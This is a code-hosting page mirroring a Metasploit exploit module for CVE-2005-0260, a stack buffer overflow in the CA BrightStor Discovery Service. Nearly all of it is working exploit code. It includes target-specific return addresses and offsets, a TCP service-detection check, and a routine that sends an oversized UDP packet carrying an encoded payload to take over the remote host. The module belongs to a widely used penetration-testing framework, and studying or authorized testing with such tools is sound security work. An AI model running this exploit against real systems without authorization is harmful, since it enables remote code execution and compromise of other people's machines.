Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/discovery_udp.rb
33119 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Udp

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'CA BrightStor Discovery Service Stack Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a vulnerability in the CA BrightStor

19
          Discovery Service. This vulnerability occurs when a large

20
          request is sent to UDP port 41524, triggering a stack buffer

21
          overflow.

22
        },

23
        'Author' => [ 'hdm', 'aushack' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2005-0260'],

27
          [ 'OSVDB', '13613'],

28
          [ 'BID', '12491'],

29
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],

30
        ],

31
        'Privileged' => true,

32
        'Payload' => {

33
          'Space' => 2048,

34
          'BadChars' => "\x00",

35
          'StackAdjustment' => -3500

36
        },

37
        'Targets' => [

38
          [

39
            'cheyprod.dll 12/12/2003',

40
            {

41
              'Platform' => 'win',

42
              'Ret' => 0x23808eb0, # call to edi reg

43
              'Offset' => 968

44
            },

45
          ],

46
          [

47
            'cheyprod.dll 07/21/2004',

48
            {

49
              'Platform' => 'win',

50
              'Ret' => 0x2380a908, # call edi

51
              'Offset' => 970

52
            },

53
          ],

54
        ],

55
        'DisclosureDate' => '2004-12-20',

56
        'DefaultTarget' => 0,

57
        'Notes' => {

58
          'Reliability' => UNKNOWN_RELIABILITY,

59
          'Stability' => UNKNOWN_STABILITY,

60
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

61
        }

62
      )

63
    )

64


65
    register_options(

66
      [

67
        Opt::RPORT(41524)

68
      ]

69
    )

70
  end

71


72
  def check

73
    # The first request should have no reply

74
    csock = Rex::Socket::Tcp.create(

75
      'PeerHost' => datastore['RHOST'],

76
      'PeerPort' => 41523,

77
      'Context' =>

78
        {

79
          'Msf' => framework,

80
          'MsfExploit' => self

81
        }

82
    )

83


84
    csock.put('META')

85
    x = csock.get_once(-1, 3)

86
    csock.close

87


88
    # The second request should be replied with the host name

89
    csock = Rex::Socket::Tcp.create(

90
      'PeerHost' => datastore['RHOST'],

91
      'PeerPort' => 41523,

92
      'Context' =>

93
        {

94
          'Msf' => framework,

95
          'MsfExploit' => self

96
        }

97
    )

98


99
    csock.put('hMETA')

100
    y = csock.get_once(-1, 3)

101
    csock.close

102


103
    if (y and !x)

104
      return Exploit::CheckCode::Detected

105
    end

106


107
    return Exploit::CheckCode::Safe

108
  end

109


110
  def exploit

111
    connect_udp

112


113
    print_status("Trying target #{target.name}...")

114


115
    buf = rand_text_english(4096)

116


117
    # Target 0:

118
    #

119
    # esp @ 971

120
    # ret @ 968

121
    # edi @ 1046

122
    # end = 4092

123


124
    buf[target['Offset'], 4] = [ target.ret ].pack('V')

125
    buf[1046, payload.encoded.length] = payload.encoded

126


127
    udp_sock.put(buf)

128
    udp_sock.recvfrom(8192)

129


130
    handler

131
    disconnect_udp

132
  end

133
end

134


135